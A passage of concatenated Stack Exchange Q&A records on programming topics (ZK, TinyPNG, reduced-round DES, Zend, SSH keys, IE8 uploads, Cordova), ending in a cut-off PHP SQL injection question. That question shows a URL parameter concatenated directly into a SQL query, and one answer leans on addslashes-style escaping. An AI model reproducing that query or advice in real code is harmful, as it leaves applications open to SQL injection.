function.\nOn the other hand, it may be that this attack might be useful against the use of NTRU as a somewhat homeomorphic cipher (which requires the error terms to be much smaller). In addition, perhaps this result can be sharpened to be strong enough to be useful against NTRU. So, while this isn't fatal to NTRU, the book isn't closed either.\n","meta":{"source":"crypto.stackexchange","title":"NTRU less secure than previously thought?","dup_signals":{}},"subset":"stackexchange"} +{"text":"How to Resizable column in pivot table in ZK\n\nQuestion: I have pivot table with large content . Right now I am facing problem of column size.\nIf there are large content in database at that time some contents are not displayed . \nIs there any property to make ZK pivottable column resizable . \nPlease check below image for more clear idea.\nAnswer: You can utilize the following Javascript to resize it.\nFor example,\n<code>zk.Widget.$(jq('@pivottable')).$n('dataTitle').style.width = '600px';\n<\/code>\nComment: No . I want to do scrollable . if my content is large than 600 px ? then what to do ?\nAnswer: See ZK pivoty tabel live demo\nhttp:\/\/www.zkoss.org\/zkdemo\/application\/pivottable\nmay be you found your solution\n","meta":{"source":"stackoverflow","title":"How to Resizable column in pivot table in ZK","dup_signals":{}},"subset":"stackexchange"} +{"text":"TInyPNG integration with Google App Engine Datastore\n\nQuestion: I need to fetch images from different URLs and store it in Google Datastore after compressing it. I understand tinyPNG is the a great API to do the compression but the API only supports Amazon S3. \nCan someone guide how to accomplish this in Google App Engine.\nAnswer: The S3-only support you mentioned applies only to directly uploading the compressed images from their server (i.e. without passing them through the application making the image compression requests), which is just a convenience feature. From the tinypng docs:\n\nUploading to Amazon S3\nYou can tell the Tinify API to upload compressed images directly to\n Amazon S3. If you use S3 to host your images this saves you the hassle\n of downloading images to your server and uploading them to S3\n yourself.\n\nYour app should be able to download the compressed images using their REST API and save them to the datastore.\nAnswer: Since the Google App Engine is read only, you can't write files to it with the built-in tinify functions. You can, though, use blob storage in the App Engine. Make sure you have the tinify code and requests module (which tinify uses) in a libs folder in your GAE app. I needed version 2.3 of requests in order for tinify to work.\nTo use image storage with GAE, define a database model for an entity with blob storage, something like:\n<code>from google.appengine.ext import ndb\n\nclass Image(ndb.Model):\n img = ndb.BlobProperty()\n<\/code>\nNow we need a function in tinify that writes to blob storage of an entity instead of writing to a file. You can mirror the existing tinify code for writing to file:\nIn the <code>source.py<\/code> file, add this method:\n<code>from google.appengine.ext import ndb\n\nclass Source(object):\n ...\n def to_blob(self, key):\n return self.result().to_blob(key)\n ...\n<\/code>\nAnd in the <code>result.py<\/code> file add this method:\n<code>from google.appengine.ext import ndb\n\nclass Result(ResultMeta):\n ...\n def to_blob(self, key):\n img_store = key.get()\n img_store.img = self.data\n ...\n<\/code>\nNow tinify can write in GAE that you can serve however you want. You just need to create an entity, pass the key to the Source.to_blob() method and your entity will now have the compressed image stored. So now you can do:\n<code>class Basepage(webapp2.RequestHandler):\n def post(self):\n ...\n img_store = Image()\n img_key = img_store.put()\n\n # Use URL for image to be compressed\n source = tinify.from_url(\"http:\/\/...\")\n source.to_blob(img_key)\n\n compressed_img_store = img_key.get()\n\n self.response.headers['Content-Type'] = 'image\/png'\n self.response.out.write(compressed_img_store.img)\n<\/code>\n","meta":{"source":"stackoverflow","title":"TInyPNG integration with Google App Engine Datastore","dup_signals":{}},"subset":"stackexchange"} +{"text":"Rotation table for 8 round DES\n\nQuestion: I'm trying to implement DES from scratch using the NIST paper and the Wikipedia article on DES.\nI got 16 round DES done, but I can't seem to get 8 round DES working. I figure it's because I got the rotation table wrong. The rotation table I'm using for the 16 round version is straight off of Wikipedia's DES Supplementary Materials, while the 8 round version is the same with a few 2's in the middle taken out to make the length 8. { 1, 1, 2, 2, 1, 2, 2, 1 } for encryption and { 0, 1, 2, 2, 1, 2, 2, 1 } for decryption, which uses inverted key scheduler for decryption. Apparently, that's wrong, and I can't find a table or a algorithm for creating a rotation table.\nIf anyone can point me to either, it'd be much appreciated.\nAnswer: The catch is that for decryption to work reliably for all keys, the subkeys must be the same for encryption and decryption with order reversed. With many DES implementations, that implies the sum of the rotations in the key schedule should be a multiple of $28$, the width of the C and D registers.\nUse say $15,2,2,2,2,2,2,1$ rather than your $1,1,2,2,1,2,2,1$ and you should be flying (assuming the code handles these larger values, and does not use the optimization enabled by the fact that after removing the first value in the DES key schedule table $1,1,2,2,2,2,2,2,1,2,2,2,2,2,2,1$, the $15$ remaining entries are a palindrome). Note: I have changed my suggested values so that the subkeys used match the ones in the last $8$ rounds of encryption in standard DES; that reuses some of the work made by DES designers when crafting PC-2 w.r.t. the key schedule.\nAlternatively, use $1,1,2,2,2,2,2,2$ for encryption and make an extra rotation by $14$ before decryption. That way we use the same subkeys as for the first $8$ rounds of encryption in standard DES.\n\nUpdate: the modified question tells us that the implementation uses different tables for encryption and decryption. In that case, $1,1,2,2,2,2,2,2$ for encryption and $14,2,2,2,2,2,2,1$ for decryption should work (with rotation counts in opposite directions and before the use of the generated subkey). The first decryption value must equal the sum of encryption values$\\pmod{28}$. The following decryption values are obtained by dropping the first encryption value and reversing the list.\nCaution: care should be taken that all keys bits are used about evenly and regularly, by considering the interaction of rotation counts with PC-2. Because I'm lazy I kept the original first $8$ $rotations, which is at least not disastrous in this respect.\nComment: Works with 1,1,2,2,2,2,2,2 for encryption and 14,2,2,2,2,2,2,1 for decryption, and also thanks for the explanation on how to get the appropriate decryption rotation table.\n","meta":{"source":"crypto.stackexchange","title":"Rotation table for 8 round DES","dup_signals":{}},"subset":"stackexchange"} +{"text":"Autoload models, forms inside modules in zend framework\n\nQuestion: My application structure is like this:\n\napplication\n\nmodules\n\ndefault\nstudent\n\ncontrollers\nforms\n\nstudentParent.php\n\nmodels\nviews\nBoostrap.php\n\nI have a studentParent.php inside forms folder of student module. \n<code>class Student_Form_studentParent extends Zend_Dojo_Form{\n}\n<\/code>\nWhenever I call this form class inside controller of student module, I get class not found error\nI have placed Bootstrap.php inside student module. \n<code>class Student_Bootstrap extends Zend_Application_Module_Bootstrap\n{\n\n}\n<\/code>\nHere's my application.ini file configuration\n<code>resources.frontController.params.displayExceptions = 0\nresource.modules=\"\"\nresources.view = \"\"\nresources.layout.layoutPath = APPLICATION_PATH \"\/layouts\/scripts\"\nresources.layout.layout = \"main_template\"\n<\/code>\nMy Bootstrap.php file:\n<code>class Bootstrap extends Zend_Application_Bootstrap_Bootstrap\n{\n protected function _initDefaultModuleAutoloader()\n {\n $moduleLoader = new Zend_Application_Module_Autoloader(\n array(\n \"namespace\" => '',\n \"basePath\" => APPLICATION_PATH.'\/modules\/default'\n )\n );\n\n Zend_Controller_Action_HelperBroker::addPrefix('App_Action_Helper');\n\n return $moduleLoader;\n }\n}\n<\/code>\nAnswer: <code>resource.modules=\"\"\n<\/code>\nshould be:\n<code>resources.modules=\"\"\n<\/code>\n(i.e. resources plural).\nI would also recommend that you use an upper case letter to start your class names, so <code>Student_Form_StudentParent<\/code> instead of <code>Student_Form_studentParent<\/code> (the filename will need to be <code>StudentParent.php<\/code> as well). Personal preference I suppose, but if the framework does it one way and your app does it another then your class naming will not be consistent.\nAnswer: Also the \n<code>$moduleLoader = new Zend_Application_Module_Autoloader(\narray(\n \"namespace\" => '',\n \"basePath\" => APPLICATION_PATH.'\/modules\/default'\n )\n );\n<\/code>\nThe basePath should point to the dir which contains modules, not, as in Your example, to the particular module dir.\nComment: Actually the module autoloader should point at the module dir, what he has is correct\n","meta":{"source":"stackoverflow","title":"Autoload models, forms inside modules in zend framework","dup_signals":{}},"subset":"stackexchange"} +{"text":"Multiple SSH Keys on the same device\n\nQuestion: I registered a personal SSH key months ago and everything worked fine. Now I'm working for a company. They created their own GitHub account and I have started a new repository.\nI know I have to add another SSH key, which I did. \nThis is the content of the ~\/.ssh\/config file.\n<code>Host github.com\n HostName github.com\n User git\n PreferredAuthentications publickey\n IdentityFile ~\/.ssh\/id_rsa\n\nHost github-companyname\n HostName github.com\n User git\n PreferredAuthentications publickey\n IdentityFile ~\/.ssh\/id_rsa_companyname\n<\/code>\nI also did <code>ssh <keyname><\/code> and I am authenticated.\nAfter that I executed the following commands.\n<code>git init\ngit add \ngit remote add origin <repo>\n<\/code>\nIt works all fine, until I run <code>git push -u origin master<\/code>.\nI get this error.\n\nERROR: Repository not found.\n fatal: Could not read from remote repository.\nPlease make sure you have the correct access rights and the repository exists.\n\nI don't understand. Everything seems to be set up correctly.\nWhy am I getting that error message?\nIf that makes any difference, I am using OSX Sierra 10.12.4.\nComment: @Jakuje added my comment as an answer.\nComment: It seems that you have an issue with multiple ssh keys for the same host with git. I have faced a similar issue. Maybe this is of help https:\/\/gist.github.com\/jexchan\/2351996 especially the comments. Make sure in your .git\/config you modify your remote origin url and change the hostname from `github.com` to `github-companyname` as defined in your ssh config.\nComment: did you add your ssh key which you use for your company github acc in the github account ssh keys section?\nComment: @IndrekOts Your link was really helpful and it solved my problem. I thank you a lot ! I will edit my answer to help other people :)\nComment: Do not add answers to the question. There is field for answer bellow! Or @IndrekOts, can you fill the answer with what you wrote in the comment, since it resolved the OPs problem?\nAnswer: Since my comment resolved OPs issue, I'm writing this as an answer.\nThe problem seems to be in the fact that you have multiple ssh keys for the same host. In your <code>.ssh\/config<\/code> you have configured 2 hosts - <code>github.com<\/code> and <code>github-companyname<\/code>. In your company repository, you need to change the remote url in <code>.git\/config<\/code> from <code>email@example.com:...<\/code> to <code>git@github-companyname:...<\/code>. Then ssh will use the correct key and you should have no problems with authentication.\nFor further reading:\n\nhttps:\/\/gist.github.com\/jexchan\/2351996 especially the comments\nhttp:\/\/nerderati.com\/2011\/03\/17\/simplify-your-life-with-an-ssh-config-file\/\n\nWhen you need to clone an existing repository with your company key, you can apply the same approach.\n<code>git clone git@github-companyname:companyname\/repositoryname.git\n<\/code>\nNotice that instead of <code>github.com<\/code>, the command uses <code>github-companyname<\/code>.\n","meta":{"source":"stackoverflow","title":"Multiple SSH Keys on the same device","dup_signals":{}},"subset":"stackexchange"} +{"text":"getting access is denied error on IE8\n\nQuestion: I have a HTML form (upload.htm) with a HTML file upload control inside of it.\n<code><form id=\"frmupload\" name=\"upload\" enctype=\"multipart\/form-data\" action=\"uploadhandler.ashx\" method=\"post\">\n <input id=\"uploader\" name=\"uploadctrl\" type=\"file\"\/>\n<\/form>\n<\/code>\nThere is also one JavaScript method in the above page which goes like:\n<code>function performUpload(){\n document.getElementById('frmupload').submit();\n}\n<\/code>\nI call this inside of a page (uploadpage.htm) from within an <code>iframe<\/code>:\n<code><iframe id=\"docframe\" src=\"upload.htm\" style=\"display:none\"><\/iframe>\n<\/code>\nI try to execute the statement shown below from the uploadpage.htm page:\n<code>var i = document.getElementById('docframe');\ni.contentWindow.performUpload();\n<\/code>\nI get an error saying Access is denied, and my debugger halts at the first JavaScript function I've shown. Both the files are in the same location in the web project. They have the same domain name too. Why do I get this error then?\nOf course, earlier, I could post the page: when I did not set the <code>name<\/code> attribute for the HTML upload control. But after I set the name attribute in HTML markup, I get this weird error. Why didn't I get this the first time?\nHad a look @ this post --> \"Access is denied\" when script tries to access iframe in IE8, but it didn't help.\nAnswer: IE doesn't allow manipulation of the type=\"file\" input element from javascript due to security reasons. Setting the filename or invoking a click event to show the browser dialog will result in an \"Access is denied\" error on the form submit - Internet Explorer is clever about remembering what methods have been invoked.\nSimilar issue: http:\/\/www.webdeveloper.com\/forum\/showthread.php?t=181272\nComment: Aha, I got it \u2014 my file input didn't have a name attribute on it. As soon as I add one, I do get the access denied error: http:\/\/jsfiddle.net\/NkycS\/32\/\nComment: Have to reaffirm this answer. I was frantically looking for an issue with my form upload where in fact I was using the custom file input in IE and this was causing the Access is Denied issue. Great insight, thx\nComment: What am I missing? This fiddle seems to prove this answer wrong; using Ender\/Bean instead of jQuery I've got IE9 opening the file picker and submitting the form to a generated iframe all via JS and it appears to work: http:\/\/jsfiddle.net\/NkycS\/27\/\nComment: Best answer for this here: http:\/\/stackoverflow.com\/questions\/572768\/styling-an-input-type-file-button?noredirect=1&lq=1\n\nAnswer by Josh Crozier\nAnswer: Traditionally, JavaScript access to HTML <code>input type=\"file\"<\/code> is severely limited for security concerns. AFAIK, You can't do the following with JS on a file uploader element:\n\nYou cannot read the \"value\" of the element as it holds the filename.\nYou can't fire up the file selection menu via JS.\nYou can't fire submit of the file uploader control via JS.\n\nAll this is in place to prevent malicious attacks like stealing your files in background via JS. I haven't played with an <code>input type=\"file\"<\/code> element in a while but my best guess is you will hit similar issues (if not all) in other browsers as well.\nYour best bet is a Flash based solution or maybe some new HTML5 control.\nAlso, here is an official reference on the subject matter:\nhttp:\/\/msdn.microsoft.com\/en-us\/library\/ms535263(v=vs.85).aspx\nCheck \"Community Content\" all the way on the bottom of the above page.\nAnswer: In both the HTML files \u2014 the one which is in the frame and another which contains the frame \u2014 try adding <code>document.domain='example.com'<\/code> where 'example.com' is your domain name.\n","meta":{"source":"stackoverflow","title":"getting access is denied error on IE8","dup_signals":{}},"subset":"stackexchange"} +{"text":"Cordova - Android - File not found error\n\nQuestion: When I run the command - cordova emulate android, I get the following error:\n\n<code>Application Error - net::ERR_FILE_NOT_FOUND (file:\/\/\/android_asset\/www\/index.html)<\/code>\n\nCordovaActivity:\n\n<code>\/*\n Licensed to the Apache Software Foundation (ASF) under one\n or more contributor license agreements. See the NOTICE file\n distributed with this work for additional information\n regarding copyright ownership. The ASF licenses this file\n to you under the Apache License, Version 2.0 (the\n \"License\"); you may not use this file except in compliance\n with the License. You may obtain a copy of the License at\n\n http:\/\/www.apache.org\/licenses\/LICENSE-2.0\n\n Unless required by applicable law or agreed to in writing,\n software distributed under the License is distributed on an\n \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY\n KIND, either express or implied. See the License for the\n specific language governing permissions and limitations\n under the License.\n*\/\npackage org.apache.cordova;\n\nimport java.util.ArrayList;\nimport java.util.Locale;\n\nimport org.json.JSONException;\nimport org.json.JSONObject;\n\nimport android.app.Activity;\nimport android.app.AlertDialog;\nimport android.annotation.SuppressLint;\nimport android.content.DialogInterface;\nimport android.content.Intent;\nimport android.content.res.Configuration;\nimport android.graphics.Color;\nimport android.media.AudioManager;\nimport android.os.Build;\nimport android.os.Bundle;\nimport android.util.Log;\nimport android.view.Menu;\nimport android.view.MenuItem;\nimport android.view.View;\nimport android.view.ViewGroup;\nimport android.view.Window;\nimport android.view.WindowManager;\nimport android.webkit.WebViewClient;\nimport android.widget.FrameLayout;\n\n\/**\n * This class is the main Android activity that represents the Cordova\n * application. It should be extended by the user to load the specific\n * html file that contains the application.\n *\n * As an example:\n * \n * <pre>\n * package org.apache.cordova.examples;\n *\n * import android.os.Bundle;\n * import org.apache.cordova.*;\n *\n * public class Example extends CordovaActivity {\n * @Override\n * public void onCreate(Bundle savedInstanceState) {\n * super.onCreate(savedInstanceState);\n * super.init();\n * \/\/ Load your application\n * loadUrl(launchUrl);\n * }\n * }\n * <\/pre>\n * \n * Cordova xml configuration: Cordova uses a configuration file at \n * res\/xml\/config.xml to specify its settings. See \"The config.xml File\"\n * guide in cordova-docs at http:\/\/cordova.apache.org\/docs for the documentation\n * for the configuration. The use of the set*Property() methods is\n * deprecated in favor of the config.xml file.\n *\n *\/\npublic class CordovaActivity extends Activity {\n public static String TAG = \"CordovaActivity\";\n\n \/\/ The webview for our app\n protected CordovaWebView appView;\n\n private static int ACTIVITY_STARTING = 0;\n private static int ACTIVITY_RUNNING = 1;\n private static int ACTIVITY_EXITING = 2;\n\n \/\/ Keep app running when pause is received. (default = true)\n \/\/ If true, then the JavaScript and native code continue to run in the background\n \/\/ when another application (activity) is started.\n protected boolean keepRunning = true;\n\n \/\/ Flag to keep immersive mode if set to fullscreen\n protected boolean immersiveMode;\n\n \/\/ Read from config.xml:\n protected CordovaPreferences preferences;\n protected String launchUrl;\n protected ArrayList<PluginEntry> pluginEntries;\n protected CordovaInterfaceImpl cordovaInterface;\n\n \/**\n * Called when the activity is first created.\n *\/\n @Override\n public void onCreate(Bundle savedInstanceState) {\n LOG.i(TAG, \"Apache Cordova native platform version \" + CordovaWebView.CORDOVA_VERSION + \" is starting\");\n LOG.d(TAG, \"CordovaActivity.onCreate()\");\n\n \/\/ need to activate preferences before super.onCreate to avoid \"requestFeature() must be called before adding content\" exception\n loadConfig();\n if (!preferences.getBoolean(\"ShowTitle\", false)) {\n getWindow().requestFeature(Window.FEATURE_NO_TITLE);\n }\n\n if (preferences.getBoolean(\"SetFullscreen\", false)) {\n Log.d(TAG, \"The SetFullscreen configuration is deprecated in favor of Fullscreen, and will be removed in a future version.\");\n preferences.set(\"Fullscreen\", true);\n }\n if (preferences.getBoolean(\"Fullscreen\", false)) {\n if (Build.VERSION.SDK_INT >= Build.VERSION_CODES.KITKAT) {\n immersiveMode = true;\n } else {\n getWindow().setFlags(WindowManager.LayoutParams.FLAG_FULLSCREEN,\n WindowManager.LayoutParams.FLAG_FULLSCREEN);\n }\n } else {\n getWindow().setFlags(WindowManager.LayoutParams.FLAG_FORCE_NOT_FULLSCREEN,\n WindowManager.LayoutParams.FLAG_FORCE_NOT_FULLSCREEN);\n }\n\n super.onCreate(savedInstanceState);\n\n cordovaInterface = makeCordovaInterface();\n if (savedInstanceState != null) {\n cordovaInterface.restoreInstanceState(savedInstanceState);\n }\n }\n\n protected void init() {\n appView = makeWebView();\n createViews();\n if (!appView.isInitialized()) {\n appView.init(cordovaInterface, pluginEntries, preferences);\n }\n cordovaInterface.onCordovaInit(appView.getPluginManager());\n\n \/\/ Wire the hardware volume controls to control media if desired.\n String volumePref = preferences.getString(\"DefaultVolumeStream\", \"\");\n if (\"media\".equals(volumePref.toLowerCase(Locale.ENGLISH))) {\n setVolumeControlStream(AudioManager.STREAM_MUSIC);\n }\n }\n\n @SuppressWarnings(\"deprecation\")\n protected void loadConfig() {\n ConfigXmlParser parser = new ConfigXmlParser();\n parser.parse(this);\n preferences = parser.getPreferences();\n preferences.setPreferencesBundle(getIntent().getExtras());\n launchUrl = parser.getLaunchUrl();\n pluginEntries = parser.getPluginEntries();\n Config.parser = parser;\n }\n\n \/\/Suppressing warnings in AndroidStudio\n @SuppressWarnings({\"deprecation\", \"ResourceType\"})\n protected void createViews() {\n \/\/Why are we setting a constant as the ID? This should be investigated\n appView.getView().setId(100);\n appView.getView().setLayoutParams(new FrameLayout.LayoutParams(\n ViewGroup.LayoutParams.MATCH_PARENT,\n ViewGroup.LayoutParams.MATCH_PARENT));\n\n setContentView(appView.getView());\n\n if (preferences.contains(\"BackgroundColor\")) {\n int backgroundColor = preferences.getInteger(\"BackgroundColor\", Color.BLACK);\n \/\/ Background of activity:\n appView.getView().setBackgroundColor(backgroundColor);\n }\n\n appView.getView().requestFocusFromTouch();\n }\n\n \/**\n * Construct the default web view object.\n * <p\/>\n * Override this to customize the webview that is used.\n *\/\n protected CordovaWebView makeWebView() {\n return new CordovaWebViewImpl(makeWebViewEngine());\n }\n\n protected CordovaWebViewEngine makeWebViewEngine() {\n return CordovaWebViewImpl.createEngine(this, preferences);\n }\n\n protected CordovaInterfaceImpl makeCordovaInterface() {\n return new CordovaInterfaceImpl(this) {\n @Override\n public Object onMessage(String id, Object data) {\n \/\/ Plumb this to CordovaActivity.onMessage for backwards compatibility\n return CordovaActivity.this.onMessage(id, data);\n }\n };\n }\n\n \/**\n * Load the url into the webview.\n *\/\n public void loadUrl(String url) {\n if (appView == null) {\n init();\n }\n\n \/\/ If keepRunning\n this.keepRunning = preferences.getBoolean(\"KeepRunning\", true);\n\n appView.loadUrlIntoView(url, true);\n }\n\n \/**\n * Called when the system is about to start resuming a previous activity.\n *\/\n @Override\n protected void onPause() {\n super.onPause();\n LOG.d(TAG, \"Paused the activity.\");\n\n if (this.appView != null) {\n \/\/ CB-9382 If there is an activity that started for result and main activity is waiting for callback\n \/\/ result, we shoudn't stop WebView Javascript timers, as activity for result might be using them\n boolean keepRunning = this.keepRunning || this.cordovaInterface.activityResultCallback != null;\n this.appView.handlePause(keepRunning);\n }\n }\n\n \/**\n * Called when the activity receives a new intent\n *\/\n @Override\n protected void onNewIntent(Intent intent) {\n super.onNewIntent(intent);\n \/\/Forward to plugins\n if (this.appView != null)\n this.appView.onNewIntent(intent);\n }\n\n \/**\n * Called when the activity will start interacting with the user.\n *\/\n @Override\n protected void onResume() {\n super.onResume();\n LOG.d(TAG, \"Resumed the activity.\");\n\n if (this.appView == null) {\n return;\n }\n \/\/ Force window to have focus, so application always\n \/\/ receive user input. Workaround for some devices (Samsung Galaxy Note 3 at least)\n this.getWindow().getDecorView().requestFocus();\n\n this.appView.handleResume(this.keepRunning);\n }\n\n \/**\n * Called when the activity is no longer visible to the user.\n *\/\n @Override\n protected void onStop() {\n super.onStop();\n LOG.d(TAG, \"Stopped the activity.\");\n\n if (this.appView == null) {\n return;\n }\n this.appView.handleStop();\n }\n\n \/**\n * Called when the activity is becoming visible to the user.\n *\/\n @Override\n protected void onStart() {\n super.onStart();\n LOG.d(TAG, \"Started the activity.\");\n\n if (this.appView == null) {\n return;\n }\n this.appView.handleStart();\n }\n\n \/**\n * The final call you receive before your activity is destroyed.\n *\/\n @Override\n public void onDestroy() {\n LOG.d(TAG, \"CordovaActivity.onDestroy()\");\n super.onDestroy();\n\n if (this.appView != null) {\n appView.handleDestroy();\n }\n }\n\n \/**\n * Called when view focus is changed\n *\/\n @Override\n public void onWindowFocusChanged(boolean hasFocus) {\n super.onWindowFocusChanged(hasFocus);\n if (hasFocus && immersiveMode) {\n final int uiOptions = View.SYSTEM_UI_FLAG_LAYOUT_STABLE\n | View.SYSTEM_UI_FLAG_LAYOUT_HIDE_NAVIGATION\n | View.SYSTEM_UI_FLAG_LAYOUT_FULLSCREEN\n | View.SYSTEM_UI_FLAG_HIDE_NAVIGATION\n | View.SYSTEM_UI_FLAG_FULLSCREEN\n | View.SYSTEM_UI_FLAG_IMMERSIVE_STICKY;\n\n getWindow().getDecorView().setSystemUiVisibility(uiOptions);\n }\n }\n\n @SuppressLint(\"NewApi\")\n @Override\n public void startActivityForResult(Intent intent, int requestCode, Bundle options) {\n \/\/ Capture requestCode here so that it is captured in the setActivityResultCallback() case.\n cordovaInterface.setActivityResultRequestCode(requestCode);\n super.startActivityForResult(intent, requestCode, options);\n }\n\n \/**\n * Called when an activity you launched exits, giving you the requestCode you started it with,\n * the resultCode it returned, and any additional data from it.\n *\n * @param requestCode The request code originally supplied to startActivityForResult(),\n * allowing you to identify who this result came from.\n * @param resultCode The integer result code returned by the child activity through its setResult().\n * @param intent An Intent, which can return result data to the caller (various data can be attached to Intent \"extras\").\n *\/\n @Override\n protected void onActivityResult(int requestCode, int resultCode, Intent intent) {\n LOG.d(TAG, \"Incoming Result. Request code = \" + requestCode);\n super.onActivityResult(requestCode, resultCode, intent);\n cordovaInterface.onActivityResult(requestCode, resultCode, intent);\n }\n\n \/**\n * Report an error to the host application. These errors are unrecoverable (i.e. the main resource is unavailable).\n * The errorCode parameter corresponds to one of the ERROR_* constants.\n *\n * @param errorCode The error code corresponding to an ERROR_* value.\n * @param description A String describing the error.\n * @param failingUrl The url that failed to load.\n *\/\n public void onReceivedError(final int errorCode, final String description, final String failingUrl) {\n final CordovaActivity me = this;\n\n \/\/ If errorUrl specified, then load it\n final String errorUrl = preferences.getString(\"errorUrl\", null);\n if ((errorUrl != null) && (!failingUrl.equals(errorUrl)) && (appView != null)) {\n \/\/ Load URL on UI thread\n me.runOnUiThread(new Runnable() {\n public void run() {\n me.appView.showWebPage(errorUrl, false, true, null);\n }\n });\n }\n \/\/ If not, then display error dialog\n else {\n final boolean exit = !(errorCode == WebViewClient.ERROR_HOST_LOOKUP);\n me.runOnUiThread(new Runnable() {\n public void run() {\n if (exit) {\n me.appView.getView().setVisibility(View.GONE);\n me.displayError(\"Application Error\", description + \" (\" + failingUrl + \")\", \"OK\", exit);\n }\n }\n });\n }\n }\n\n \/**\n * Display an error dialog and optionally exit application.\n *\/\n public void displayError(final String title, final String message, final String button, final boolean exit) {\n final CordovaActivity me = this;\n me.runOnUiThread(new Runnable() {\n public void run() {\n try {\n AlertDialog.Builder dlg = new AlertDialog.Builder(me);\n dlg.setMessage(message);\n dlg.setTitle(title);\n dlg.setCancelable(false);\n dlg.setPositiveButton(button,\n new AlertDialog.OnClickListener() {\n public void onClick(DialogInterface dialog, int which) {\n dialog.dismiss();\n if (exit) {\n finish();\n }\n }\n });\n dlg.create();\n dlg.show();\n } catch (Exception e) {\n finish();\n }\n }\n });\n }\n\n \/*\n * Hook in Cordova for menu plugins\n *\/\n @Override\n public boolean onCreateOptionsMenu(Menu menu) {\n if (appView != null) {\n appView.getPluginManager().postMessage(\"onCreateOptionsMenu\", menu);\n }\n return super.onCreateOptionsMenu(menu);\n }\n\n @Override\n public boolean onPrepareOptionsMenu(Menu menu) {\n if (appView != null) {\n appView.getPluginManager().postMessage(\"onPrepareOptionsMenu\", menu);\n }\n return true;\n }\n\n @Override\n public boolean onOptionsItemSelected(MenuItem item) {\n if (appView != null) {\n appView.getPluginManager().postMessage(\"onOptionsItemSelected\", item);\n }\n return true;\n }\n\n \/**\n * Called when a message is sent to plugin.\n *\n * @param id The message id\n * @param data The message data\n * @return Object or null\n *\/\n public Object onMessage(String id, Object data) {\n if (\"onReceivedError\".equals(id)) {\n JSONObject d = (JSONObject) data;\n try {\n this.onReceivedError(d.getInt(\"errorCode\"), d.getString(\"description\"), d.getString(\"url\"));\n } catch (JSONException e) {\n e.printStackTrace();\n }\n } else if (\"exit\".equals(id)) {\n finish();\n }\n return null;\n }\n\n protected void onSaveInstanceState(Bundle outState) {\n cordovaInterface.onSaveInstanceState(outState);\n super.onSaveInstanceState(outState);\n }\n\n \/**\n * Called by the system when the device configuration changes while your activity is running.\n *\n * @param newConfig The new device configuration\n *\/\n @Override\n public void onConfigurationChanged(Configuration newConfig) {\n super.onConfigurationChanged(newConfig);\n if (this.appView == null) {\n return;\n }\n PluginManager pm = this.appView.getPluginManager();\n if (pm != null) {\n pm.onConfigurationChanged(newConfig);\n }\n }\n\n \/**\n * Called by the system when the user grants permissions\n *\n * @param requestCode\n * @param permissions\n * @param grantResults\n *\/\n @Override\n public void onRequestPermissionsResult(int requestCode, String permissions[],\n int[] grantResults) {\n try\n {\n cordovaInterface.onRequestPermissionResult(requestCode, permissions, grantResults);\n }\n catch (JSONException e)\n {\n LOG.d(TAG, \"JSONException: Parameters fed into the method are not valid\");\n e.printStackTrace();\n }\n\n }\n\n}<\/code>\n\nJS included:\n\n<code> \n <script type=\"text\/javascript\" src=\"cordova.js\"><\/script>\n\n <!-- build:js(.) scripts\/vendor.js -->\n <!-- bower:js -->\n <script src=\"bower_components\/jquery\/dist\/jquery.js\"><\/script>\n <script src=\"bower_components\/angular\/angular.js\"><\/script>\n <script src=\"bower_components\/bootstrap\/dist\/js\/bootstrap.js\"><\/script>\n <script src=\"bower_components\/angular-animate\/angular-animate.js\"><\/script>\n <script src=\"bower_components\/angular-cookies\/angular-cookies.js\"><\/script>\n <script src=\"bower_components\/angular-resource\/angular-resource.js\"><\/script>\n <script src=\"bower_components\/angular-route\/angular-route.js\"><\/script>\n <script src=\"bower_components\/angular-sanitize\/angular-sanitize.js\"><\/script>\n <script src=\"bower_components\/angular-touch\/angular-touch.js\"><\/script>\n <!-- endbower -->\n <!-- endbuild -->\n\n <!-- build:js({.tmp,app}) scripts\/scripts.js -->\n <script src=\"scripts\/app.js\"><\/script>\n <script src=\"scripts\/controllers\/main.js\"><\/script>\n <script src=\"scripts\/controllers\/scan.js\"><\/script>\n <script src=\"scripts\/controllers\/payment.js\"><\/script>\n <script src=\"scripts\/services\/cordova.js\"><\/script>\n <!-- endbuild -->\n \n <\/body><\/code>\n\nscreenshot of the folder structure-\n\nWhen I checked thoroughly, there is actually no index.html file generated. What might be the issue?\nComment: Could you post your Script with `JS` includes and `Cordova Activity` code also.\nComment: there you go..edited question and added\nComment: Give a try with adding `super.loadUrl(\"file:\/\/\/android_asset\/www\/index.html\");` in `onCreate` of `Cordova Activity`.\nComment: THERE IS NO index.html file in file:\/\/\/android_asset\/www!\nComment: Copy `index.html` from `App` Directory and Paste same file in `Asset -> www` Folder.\nComment: Still i am getting the Same error!\nAnswer: Cordova load HTML from assets to show UI, you must be missing some step in Apache Cordova CLI. \nSince there is no html pages in Asset that's why cordova is unable to inflate any UI and showing that error. \nWhat you can do \n\nTry to create another project and follow instruction and try to execute commands in proper order.\nonce you have finished step 1 make sure there should be an auto generated index.html along with cordova.js in Asset folder like below :- \nComment: I tried- cordova platform add android rm and again - >cordova platform add android, did not help! Mine is an AJS set up. index.html is the only one missing, all others in place!\nAnswer: You can create assets\/www folder and then add the HTML pages there. In this case, it is index.html.\nYou can follow this tutorial at \nhttp:\/\/www.adobe.com\/devnet\/archive\/html5\/articles\/getting-started-with-phonegap-in-eclipse-for-android.html\nCreate an assets\/www directory and a libs directory inside of the new Android project. All of the HTML and JavaScript for your PhoneGap application interface will reside within the assets\/www folder.\n","meta":{"source":"stackoverflow","title":"Cordova - Android - File not found error","dup_signals":{}},"subset":"stackexchange"} +{"text":"how to avoid mysql injection when referencing the web url\n\nQuestion: I have a web page that filtered based on the url path. The address is something like this:\nwww.xxx.com\/player-profile\/?ID=130\nThe page is filtered using the ID field as follows:\n<code>$playerid = $_GET['ID'];\n\n$result = mysql_query(\"SELECT * FROM tblPlayers Where lng_RecordID_PK LIKE \".$playerid.\"\");\n<\/code>\nI want to ensure there are not any security issues with this code. I figure someone may try and manipulate the url. Any suggestions?\nComment: I'm not sure about this , but what about just casting it as int ? would that be safe to prevent injections ?\nAnswer: Use either <code>addslashes<\/code> or <code>mysql_real_escape_string<\/code> functions on <code>$playerid<\/code>. Also, enclose the <code>$playerid<\/code> in quotes when inserting it into your query. Finally, avoid using <code>LIKE<\/code> when a simple <code>=<\/code> would do the exact same thing.\nAnswer: You could use PDO Prepared Statements as a safe way of executing your SQL queries.\nAnswer: Since the ID is numeric there's a very easy and 